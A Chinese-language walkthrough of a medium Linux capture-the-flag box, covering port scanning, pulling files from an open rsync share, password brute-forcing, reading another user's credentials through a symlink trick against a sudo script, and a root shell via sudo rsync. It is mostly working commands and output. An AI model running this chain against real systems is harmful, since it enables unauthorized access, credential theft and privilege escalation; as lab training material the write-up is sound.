Box Info #
| OS | Difficulty |
|---|---|
| Linux | Medium |
Nmap #
[root@kali] /home/kali/sabulaji
❯ nmap 192.168.55.88 -sV -A -p-
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
| 256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_ 256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open http Apache httpd 2.4.62 ((Debian))
|_http-title: epages
|_http-server-header: Apache/2.4.62 (Debian)
873/tcp open rsync (protocol version 31)
Dirsearch #
[root@kali] /home/kali/sabulaji
❯ dirsearch -u http://192.168.55.88
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289
Target: http://192.168.55.88/
[03:28:14] Scanning:
[03:28:16] 403 - 278B - /.php
[03:28:23] 200 - 2KB - /index.html
[03:28:27] 403 - 278B - /server-status
[03:28:27] 403 - 278B - /server-status/
Task Completed
并没有什么有价值的东西
Rsync #
再来看看873端口,rsync 是一个快速、功能强大的远程文件同步工具,常用于备份、镜像和跨网络同步。
查看一下目标机器上开放的模块
[root@kali] /home/kali/sabulaji
❯ rsync 192.168.55.88::
public Public Files
epages Secret Documents
其中public是免密访问的
[root@kali] /home/kali/sabulaji
❯ rsync -av rsync://192.168.55.88/public .
receiving incremental file list
./
todo.list
sent 46 bytes received 552 bytes 1,196.00 bytes/sec
total size is 433 speedup is 0.72
[root@kali] /home/kali/sabulaji
❯ ls
todo.list
[root@kali] /home/kali/sabulaji
❯ cat todo.list
To-Do List
=========
1. sabulaji: Remove private sharing settings
- Review all shared files and folders.
- Disable any private sharing links or permissions.
2. sabulaji: Change to a strong password
- Create a new password (minimum 12 characters, include uppercase, lowercase, numbers, and symbols).
- Update the password in the system settings.
- Ensure the new password is not reused from other accounts.
=========
似乎是说当前密码还是弱密码,没有修改,因此尝试爆破,可以使用下面的工具
以sabulaji为用户名进行爆破,得到密码是admin123
epages拿下来
[root@kali] /home/kali/sabulaji
❯ rsync -av rsync://sabulaji@192.168.55.88/epages . ⏎
Password:
receiving incremental file list
./
secrets.doc
sent 46 bytes received 13,435 bytes 5,392.40 bytes/sec
total size is 13,312 speedup is 0.99
打开发现一个密码字符串
welcome用户(老演员了)
Own sabulaji #
查看sudo
welcome@Sabulaji:~$ sudo -l
Matching Defaults entries for welcome on Sabulaji:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User welcome may run the following commands on Sabulaji:
(sabulaji) NOPASSWD: /opt/sync.sh
查看脚本内容
#!/bin/bash
if [ -z $1 ]; then
echo "error: note missing"
exit
fi
note=$1
if [[ "$note" == *"sabulaji"* ]]; then
echo "error: forbidden"
exit
fi
difference=$(diff /home/sabulaji/personal/notes.txt $note)
if [ -z "$difference" ]; then
echo "no update"
exit
fi
echo "Difference: $difference"
cp $note /home/sabulaji/personal/notes.txt
echo "[+] Updated."
看起来像一个比较文件,如果不同然后覆盖的功能,命令注入似乎并不可能,但是可以读取文件
welcome@Sabulaji:~$ sudo -u sabulaji /opt/sync.sh /etc/passwd
Difference: 0a1,27
> root:x:0:0:root:/root:/bin/bash
> daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
> bin:x:2:2:bin:/bin:/usr/sbin/nologin
> sys:x:3:3:sys:/dev:/usr/sbin/nologin
> sync:x:4:65534:sync:/bin:/bin/sync
> games:x:5:60:games:/usr/games:/usr/sbin/nologin
> man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
> lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
> mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
> news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
> uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
> proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
> www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
> backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
> list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
> irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
> gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
> nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
> _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
> systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
> systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
> systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
> systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
> messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
> sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
> welcome:x:1000:1000:,,,:/home/welcome:/bin/bash
> sabulaji:x:1001:1001::/home/sabulaji:/bin/bash
[+] Updated.
虽然脚本里检测了sabulaji,但是可以通过软链接绕过,这里实在找不到文件了,看了眼wp,发现居然是creds.txt
welcome@Sabulaji:~$ ln -s /home/sabulaji/personal/creds.txt /home/welcome/test
welcome@Sabulaji:~$ sudo -u sabulaji /opt/sync.sh /home/welcome/test
Difference: 0a1
> Sensitive Credentials:Z2FzcGFyaW4=
[+] Updated.
拿到密码可以进行登录
Root #
sabulaji@Sabulaji:~$ sudo -l
Matching Defaults entries for sabulaji on Sabulaji:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sabulaji may run the following commands on Sabulaji:
(ALL) NOPASSWD: /usr/bin/rsync
最后这里就非常简单了
sabulaji@Sabulaji:~$ sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
# id
uid=0(root) gid=0(root) groups=0(root)
#